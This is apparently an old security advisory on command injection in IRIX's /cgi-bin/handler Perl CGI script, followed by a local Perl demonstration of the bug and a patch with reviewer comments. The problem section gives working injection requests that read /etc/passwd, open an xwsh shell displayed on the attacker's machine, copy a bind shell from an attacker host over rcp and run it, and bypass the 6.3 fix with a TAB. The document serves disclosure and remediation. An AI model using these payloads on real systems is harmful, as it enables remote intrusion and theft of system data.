COMMAND
/cgi-bin/handler
SYSTEMS AFFECTED
IRIX 5.3, 6.2, 6.3, 6.4
PROBLEM
"handler" is a small perl script that is meant (in theory) to let users read and
download files below the server's document root. In practice it lets anyone
execute arbitrary commands remotely on the target machine, as the web server user.
Here is how it works. "handler" reads PATH_INFO from the environment and
concatenates it with a fixed "root directory" (say /var/www/htdocs). It then
runs a "validity check" on the result, but that check only looks for ".."
and not for other potentially dangerous special characters. It then calls
"open (INPUT, $doc)", where $doc is the concatenated string. If you are
familiar with Perl you know that in this two-argument form of open a
filename ending in '|' is not opened as a file: perl hands it to the shell
as a command, runs it and gives you its STDOUT. The way to exploit this
"feature" in cgi-bin/handler is:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat<TAB>/etc/passwd|?data=Download HTTP/1.0
or you may try:
telnet target.machine.com 80
GET /cgi-bin/handler/blah;/usr/sbin/xwsh<TAB>-display<TAB>yourhost.com|?data=Download
(<TAB> stands for a literal tab character; see the note on TABs below.)
Also:
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh<TAB>-display<TAB>enemy:0<TAB>-e<TAB>/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%
An attacker may also try this (rcp a bind shell onto the target, then
connect to it; "+ +" in the attacker's .rhosts lets the victim's rcp pull
the files):
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp<TAB>evil_cracker@enemy.com:portshell<TAB>/tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell<TAB>31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker@enemy.com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]
Note that you have to use a TAB character after cat (and wherever else the
command needs whitespace), not a space: the HTTP server splits the request
line on spaces, so a space would end the URL, whereas the shell accepts a
TAB as a separator just as well and the server leaves it alone. You cannot
use the %xx encoding (%20) either, because the script does no decoding of
PATH_INFO, so you cannot pass commands that contain real spaces.
Of course, you can use any other command instead of "cat", but remember
NOT to use spaces, just TABs.
An error saying that the bogus filename ("whatever" in the request above)
couldn't be opened will be displayed, but the command after the ';' is
executed anyway. Credit goes to Razvan Dragomirescu.
This was tested on two Indy machines running IRIX 6.2 and one running IRIX 5.3.
For IRIX 6.3 the code was changed. One line was added to the script:
$doc=~s/\|*$//
(in plain English: "remove any number of '|' characters at end-of-string").
But guess what: it works just as well if you put another TAB character
after the "pipe", so that the TAB, not the "pipe", is at end-of-string.
The regex then leaves the '|' in place, and perl's two-argument open strips
trailing whitespace from the filename before checking whether it ends in
'|', so the string is still handed to the shell as a command.
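The following is an added example, not SGI's handler script and not code
from the original advisory: a stand-alone re-creation of the three open()
behaviours described above (the 5.3/6.2 script, the 6.3 script with the
trailing-'|' strip, and a fixed version) so the bug and the TAB bypass can
be reproduced locally without a web server. $ROOT, the sub names and the
PATH_INFO probes are assumptions for this demo.

```perl
#!/usr/bin/perl
# Added example, not SGI's handler script and not from the original
# advisory: a stand-alone re-creation of the open() behaviour described
# above so the bug can be reproduced locally without a web server.
# $ROOT, the sub names and the probes are assumptions for this demo.
use strict;
use warnings;

my $ROOT = '/var/www/htdocs';   # assumed document root, as in the text

# IRIX 5.3/6.2 handler: only ".." is rejected, then a two-argument open.
# A $doc ending in '|' (after trailing whitespace is stripped) is handed
# to the shell as a command and its STDOUT is returned instead of a file.
sub open_orig {
    my ($path_info) = @_;
    return 'rejected by ValidPath' if $path_info =~ /\.\./;
    my $doc = $ROOT . $path_info;
    open(INPUT, $doc) or return "open failed: $!";
    my $out = join '', <INPUT>;
    close INPUT;
    return $out;
}

# IRIX 6.3 handler: same, but first strips any run of '|' at end-of-string.
sub open_63 {
    my ($path_info) = @_;
    return 'rejected by ValidPath' if $path_info =~ /\.\./;
    my $doc = $ROOT . $path_info;
    $doc =~ s/\|*$//;               # misses "...|<TAB>": the TAB is last
    open(INPUT, $doc) or return "open failed: $!";
    my $out = join '', <INPUT>;
    close INPUT;
    return $out;
}

# Fixed: reject '|' and ';' in PATH_INFO (as the patch in SOLUTION does)
# and use the three-argument open, which never treats the name as a command.
sub open_fixed {
    my ($path_info) = @_;
    return 'rejected by ValidPath'
        if $path_info =~ /\.\./ || $path_info =~ /[|;]/;
    my $doc = $ROOT . $path_info;
    open(my $fh, '<', $doc) or return "open failed: $!";
    my $out = join '', <$fh>;
    close $fh;
    return $out;
}

# Constructed PATH_INFO values as the HTTP server would pass them. "\t"
# is the TAB that stands in for every space of the injected command; `id`
# is used instead of `cat /etc/passwd` to show who the command runs as.
my @probes = (
    "/whatever;id|",      # works on 5.3/6.2; 6.3 strips the '|'
    "/whatever;id|\t",    # works on 6.3 too: '|' is no longer last
);

for my $case ([ 'orig ', \&open_orig ], [ '6.3  ', \&open_63 ],
              [ 'fixed', \&open_fixed ]) {
    my ($name, $fn) = @$case;
    for my $p (@probes) {
        (my $shown  = $p) =~ s/\t/<TAB>/g;
        (my $result = $fn->($p)) =~ s/\n.*//s;   # first line of output only
        print "$name  PATH_INFO=$shown  =>  $result\n";
    }
}
```

Run it with perl from any shell. The shell's complaint that
/var/www/htdocs/whatever cannot be found goes to stderr and is the error
message mentioned above; the uid line printed by `id` is what the vulnerable
variants return as the "file" contents, while the fixed variant rejects both
probes before any open() happens.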
SOLUTION
Remove the handler script; you most likely do not need it. If you want to
patch it instead, a patch by Wolfram Schneider follows. Apply the same
change to wrap, which has the same problem:
*** handler.orig Wed Jul 23 20:49:26 1997
--- handler Wed Jul 23 20:55:25 1997
***************
*** 26,31 ****
--- 26,32 ----
$pathRoot = $_[$#_] ;
$doc = $ROOT.$PATH ;
+ $_ = $PATH;
&ErrBadPath unless &ValidPath ; # Check for server spoofing
#__________________________________________________________
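Review bot: the added `$_ = $PATH;` assigns the global `$_`, which clobbers whatever the caller had in it and is easy to trip over later; use `local $_ = $PATH;` or, better, pass the path into ValidPath as an argument. Validating `$PATH` rather than `$doc` is fine here, since `$doc = $ROOT.$PATH` and `$ROOT` is fixed.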
***************
*** 108,113 ****
--- 109,117 ----
sub ValidPath
{
+ # suggested by drazvan@kappa.ro
+ if (/[|;]/) { return '' };
+
return 1 unless /\.\./ ;
return '' if /^\.\./ ;
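Review bot: the `if (/[|;]/) { return '' };` check stops the two characters abused in this advisory, but it is a blacklist; the root cause is the two-argument `open (INPUT, $doc)` further down, which is what turns a name into a command. Switching that call to the three-argument form, `open (INPUT, '<', $doc)`, makes a trailing '|' (with or without a TAB after it) just part of a filename, and this check then becomes defence in depth. Consider also rejecting control characters (the TAB trick) rather than only '|' and ';'.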
***************
*** 117,120 ****
--- 121,136 ----
return 1 ;
}
+ sub ErrBadPath
+ {
+ print <<ENDOFTEXT ;
+ Content-type: text/html
+ <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+ <BODY><H1>404 Not Found</H1>
+ The requested URL $PATH was not found on this server.<P>
+ </BODY>
+ ENDOFTEXT
+
+ die ;
+ }
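Review bot: as shown, the heredoc in ErrBadPath has no blank line between `Content-type: text/html` and `<HEAD>`, so the HTML would be read as part of the CGI header block; an empty line is required to end the headers. It also emits no `Status: 404 Not Found` header, so the server will send a 200 response carrying a 404 page. Finally, `$PATH` is interpolated into the HTML unescaped, so the rejected path is reflected back to the client verbatim; escape `<`, `>` and `&` or leave the path out of the message.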